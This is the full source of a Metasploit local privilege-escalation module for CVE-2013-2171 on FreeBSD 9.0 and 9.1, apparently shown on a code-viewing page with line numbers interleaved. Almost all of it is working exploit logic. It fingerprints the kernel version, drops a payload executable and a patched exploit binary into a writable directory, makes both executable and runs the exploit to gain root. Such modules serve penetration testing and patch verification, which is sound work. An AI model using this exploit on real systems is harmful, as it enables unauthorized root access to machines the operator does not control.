Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::EXE
10
  include Msf::Post::File
11
  include Msf::Exploit::FileDropper
12

13
  def initialize(info={})
14
    super( update_info( info, {
15
        'Name'          => 'FreeBSD 9 Address Space Manipulation Privilege Escalation',
16
        'Description'   => %q{
17
          This module exploits a vulnerability that can be used to modify portions of
18
          a process's address space, which may lead to privilege escalation.  Systems
19
          such as FreeBSD 9.0 and 9.1 are known to be vulnerable.
20
        },
21
        'License'       => MSF_LICENSE,
22
        'Author'        =>
23
          [
24
            'Konstantin Belousov',   # Discovery
25
            'Alan Cox',              # Discovery
26
            'Hunger',                # POC
27
            'sinn3r'                 # Metasploit
28
          ],
29
        'Platform'      => [ 'bsd' ],
30
        'Arch'          => [ ARCH_X86 ],
31
        'SessionTypes'  => [ 'shell' ],
32
        'References'    =>
33
          [
34
            [ 'CVE', '2013-2171' ],
35
            [ 'OSVDB', '94414' ],
36
            [ 'EDB', '26368' ],
37
            [ 'BID', '60615' ],
38
            [ 'URL', 'http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc' ]
39
          ],
40
        'Targets'       =>
41
          [
42
            [ 'FreeBSD x86', {} ]
43
          ],
44
        'DefaultTarget' => 0,
45
        'DisclosureDate' => '2013-06-18',
46
      }
47
    ))
48
    register_options([
49
      # It isn't OptPath becuase it's a *remote* path
50
      OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
51
    ])
52

53
  end
54

55
  def check
56
    res = cmd_exec('uname -a')
57
    return Exploit::CheckCode::Appears if res =~ /FreeBSD 9\.[01]/
58

59
    Exploit::CheckCode::Safe
60
  end
61

62
  def upload_payload
63
    fname = datastore['WritableDir']
64
    fname = "#{fname}/" unless fname =~ %r'/$'
65
    if fname.length > 36
66
      fail_with(Failure::BadConfig, "WritableDir can't be longer than 33 characters")
67
    end
68
    fname = "#{fname}#{Rex::Text.rand_text_alpha(4)}"
69

70
    p = generate_payload_exe
71
    write_file(fname, p)
72
    return nil if not file_exist?(fname)
73
    cmd_exec("chmod +x #{fname}")
74
    fname
75
  end
76

77
  def generate_exploit(payload_fname)
78
    #
79
    # Metasm does not support FreeBSD executable generation.
80
    #
81
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2171.bin")
82
    x = File.open(path, 'rb') { |f| f.read(f.stat.size) }
83
    x.gsub(/MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/, payload_fname.ljust(40, "\x00"))
84
  end
85

86
  def upload_exploit(payload_fname)
87
    fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
88
    bin = generate_exploit(payload_fname)
89
    write_file(fname, bin)
90
    return nil if not file_exist?(fname)
91
    cmd_exec("chmod +x #{fname}")
92
    fname
93
  end
94

95
  def exploit
96
    payload_fname = upload_payload
97
    fail_with(Failure::NotFound, "Payload failed to upload") if payload_fname.nil?
98
    print_status("Payload #{payload_fname} uploaded.")
99

100
    exploit_fname = upload_exploit(payload_fname)
101
    fail_with(Failure::NotFound, "Exploit failed to upload") if exploit_fname.nil?
102
    print_status("Exploit #{exploit_fname} uploaded.")
103

104
    register_files_for_cleanup(payload_fname, exploit_fname)
105

106
    print_status("Executing #{exploit_fname}")
107
    cmd_exec(exploit_fname)
108
  end
109
end
110

111